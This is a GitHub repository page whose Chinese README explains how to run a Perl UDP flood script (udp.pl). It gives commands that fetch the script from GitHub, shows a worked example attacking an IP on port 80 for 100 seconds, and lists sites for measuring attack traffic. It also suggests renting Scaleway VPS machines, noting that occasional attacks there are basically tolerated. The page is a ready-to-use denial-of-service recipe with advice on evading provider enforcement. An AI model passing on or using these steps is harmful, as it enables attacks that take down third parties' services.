Skip to content

5bc2e7/ALP_Script

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

作者: Laowang

时间: 2019-10-12

分类: 默认分类

本机发包脚本使用方法说明.

登陆VPS,执行命令

CentOS:

yum update -y
yum install wget perl dstat -y
wget https://raw.githubusercontent.com/whunt1/ALP_Script/master/udp.pl

Debian & Ubuntu:

apt-get update -y
apt-get install wget perl dstat -y
wget https://raw.githubusercontent.com/whunt1/ALP_Script/master/udp.pl

执行命令:perl udp.pl IP port thread time(s).

如要攻击1.2.3.4,80端口攻击100秒

perl udp.pl 1.2.3.4 80 200 100

这里的200是线程,根据VPS网络性能自己决定.

监控网络状况可以输入 dstat 查看.

要查看打出多少流量,可以访问下面几个测量的墙.

测量网站

vedbex

ddosfilter

cyber-hub

toolsmania

dstat.live

dstat.cc

什么?不知道用那里的机器发包?

scaleway online旗下的 只要你别一直打 基本没事.

scaleway官网

标签: none

About

ALP本机发包脚本

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Perl 100.0%